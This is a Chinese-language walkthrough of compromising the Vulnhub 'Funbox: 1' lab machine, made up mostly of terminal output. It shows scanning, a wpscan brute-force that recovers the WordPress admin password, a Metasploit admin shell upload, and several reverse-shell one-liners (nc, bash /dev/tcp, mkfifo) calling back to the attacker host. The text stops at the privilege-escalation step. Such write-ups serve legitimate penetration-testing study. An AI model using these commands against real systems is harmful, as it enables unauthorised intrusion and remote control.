Vulnhub之Funbox 1靶机详细测试过程

郭卫东 · 2023-5-8 19:36:23

Funbox

作者：jason_huawen
靶机信息

名称：Funbox: 1
地址：

https://www.vulnhub.com/entry/funbox-1,518/

复制代码

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:c7:64:09 1 60 PCS Systemtechnik GmbH
192.168.56.164 08:00:27:a7:af:87 1 60 PCS Systemtechnik GmbH

复制代码

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164
NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.164 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-10 21:17 EST
Nmap scan report for bogon (192.168.56.164)
Host is up (0.00013s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/10%Time=63BE1C3F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:A7:AF:87 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.83 seconds

复制代码

NMAP扫描结果表明目标主机有4个开放端口：21（FTP）、22（SSH）、80（HTTP)、33060(Mysqlx?)
获得Shell

21端口

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ ftp 192.168.56.164
Connected to 192.168.56.164.
220 ProFTPD Server (Debian) [::ffff:192.168.56.164]
Name (192.168.56.164:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.

复制代码

目标主机不允许匿名访问；
FTP服务软件维ProFTDd，但版本未知

80端口

Kali Linux上浏览器访问80端口，返回错误，发现指向了funbox.fritz.box，将其加入/etc/hosts文件中：

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.164 funbox.fritz.box

复制代码

刷新页面，从返回页面得知为wordpress站点。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/robots.txt
Disallow: /secret/
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ curl http://funbox.fritz.box/secret/
No secrets here. Try harder !

复制代码

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ nikto -h http://192.168.56.164
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.164
+ Target Hostname: 192.168.56.164
+ Target Port: 80
+ Start Time: 2023-01-10 21:26:11 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://funbox.fritz.box/
+ Uncommon header 'link' found, with multiple values: (<http://funbox.fritz.box/index.php/wp-json/>; rel="https://api.w.org/",<http://funbox.fritz.box/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Multiple index files found: /index.php, /default.htm
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /secret/: This might be interesting...
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7916 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2023-01-10 21:27:20 (GMT-5) (69 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

nikto工具发现了wordpress管理后台，再尝试用wpscan工具之前，先扫描一下有无其他可利用的目录或者文件。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/10 21:28:50 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/server-status (Status: 403) [Size: 279]
Progress: 220410 / 220561 (99.93%)
===============================================================
2023/01/10 21:29:32 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ gobuster dir -u http://192.168.56.164 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,js,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/01/10 21:29:43 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 61294]
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.164/wp-content/]
/wp-login.php (Status: 200) [Size: 4502]
/license.txt (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.164/wp-includes/]
/readme.html (Status: 200) [Size: 7278]
/robots.txt (Status: 200) [Size: 19]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.164/secret/]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.164/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/wp-signup.php (Status: 302) [Size: 0] [--> http://funbox.fritz.box/wp-login.php?action=register]
/server-status (Status: 403) [Size: 279]
Progress: 1322235 / 1323366 (99.91%)
===============================================================
2023/01/10 21:34:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ dirb http://192.168.56.164
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan 10 21:34:37 2023
URL_BASE: http://192.168.56.164/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.164/ ----
+ http://192.168.56.164/index.php (CODE:200|SIZE:61294)
+ http://192.168.56.164/robots.txt (CODE:200|SIZE:19)
==> DIRECTORY: http://192.168.56.164/secret/
+ http://192.168.56.164/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.164/wp-admin/
==> DIRECTORY: http://192.168.56.164/wp-content/
==> DIRECTORY: http://192.168.56.164/wp-includes/
+ http://192.168.56.164/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.164/secret/ ----
+ http://192.168.56.164/secret/index.html (CODE:200|SIZE:30)
---- Entering directory: http://192.168.56.164/wp-admin/ ----
+ http://192.168.56.164/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/css/
==> DIRECTORY: http://192.168.56.164/wp-admin/images/
==> DIRECTORY: http://192.168.56.164/wp-admin/includes/
+ http://192.168.56.164/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-admin/js/
==> DIRECTORY: http://192.168.56.164/wp-admin/maint/
==> DIRECTORY: http://192.168.56.164/wp-admin/network/
==> DIRECTORY: http://192.168.56.164/wp-admin/user/
---- Entering directory: http://192.168.56.164/wp-content/ ----
+ http://192.168.56.164/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.164/wp-content/plugins/
==> DIRECTORY: http://192.168.56.164/wp-content/themes/
==> DIRECTORY: http://192.168.56.164/wp-content/upgrade/
==> DIRECTORY: http://192.168.56.164/wp-content/uploads/
---- Entering directory: http://192.168.56.164/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-admin/network/ ----
+ http://192.168.56.164/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-admin/user/ ----
+ http://192.168.56.164/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.164/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/plugins/ ----
+ http://192.168.56.164/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/themes/ ----
+ http://192.168.56.164/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.164/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.164/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jan 10 21:34:57 2023
DOWNLOADED: 36896 - FOUND: 14

复制代码

gobuster或者dirb没有扫描出更多有价值的目录或者文件。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:24 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] joe
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:36:34 2023
[+] Requests Done: 57
[+] Cached Requests: 8
[+] Data Sent: 14.838 KB
[+] Data Received: 573.9 KB
[+] Memory used: 239.93 MB
[+] Elapsed time: 00:00:09

复制代码

wpscan扫描出用户：admin joe，接下来看是否可以破解admin的密码？

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ wpscan --url http://funbox.fritz.box/ -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://funbox.fritz.box/ [192.168.56.164]
[+] Started: Tue Jan 10 21:36:56 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://funbox.fritz.box/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://funbox.fritz.box/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://funbox.fritz.box/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://funbox.fritz.box/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / iubire
Trying admin / iubire Time: 00:00:11 < > (665 / 14345057) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: iubire
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jan 10 21:37:24 2023
[+] Requests Done: 806
[+] Cached Requests: 38
[+] Data Sent: 265.434 KB
[+] Data Received: 3.374 MB
[+] Memory used: 287.012 MB
[+] Elapsed time: 00:00:27

复制代码

用破解得到的用户名和密码登录wordpress后台。
当尝试修改404模板时，update file，返回错误：

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

复制代码

看来通过修改404模板的方式不可行，需要看一下其他方式。

msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.146
LHOST => 192.168.56.146
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.164
RHOSTS => 192.168.56.164
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD iubire
PASSWORD => iubire
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[-] Handler failed to bind to 192.168.56.146:5555:- -
[-] Handler failed to bind to 0.0.0.0:5555:- -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:5555).
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) >
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS funbox.fritz.box
RHOSTS => funbox.fritz.box
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.146:5555
[*] Authenticating with WordPress using admin:iubire...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/RDbPTmaIBL/GUpqQZSzdR.php...
[*] Sending stage (39927 bytes) to 192.168.56.164
[+] Deleted GUpqQZSzdR.php
[+] Deleted RDbPTmaIBL.php
[+] Deleted ../RDbPTmaIBL
[*] Meterpreter session 1 opened (192.168.56.146:5555 -> 192.168.56.164:54050) at 2023-01-10 21:47:30 -0500
meterpreter > shell
Process 2443 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which nc
sh: 0: getcwd() failed: No such file or directory
/usr/bin/nc
nc -e /bin/bash 192.168.56.146 6666
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash -i >& /dev/tcp/192.168.56.146/6666 0>&1
/bin/sh: 6: Syntax error: Bad fd number
meterpreter > bash -c 'bash -i >& /dev/tcp/192.168.56.146/6666 0>&1'
[-] Unknown command: bash
meterpreter > shell
Process 2458 created.
Channel 1 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 6666 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory

复制代码

在meterpreter shell基础上spawn一个新的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox]
└─$ sudo nc -nlvp 6666
listening on [any] 6666 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.164] 56812
sh: 0: getcwd() failed: No such file or directory
/bin/sh: 0: can't access tty; job control turned off
$ which python
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

复制代码

提权

ww-data@funbox:/home/funny$ cat .reminder.sh
cat .reminder.sh
#!/bin/bash
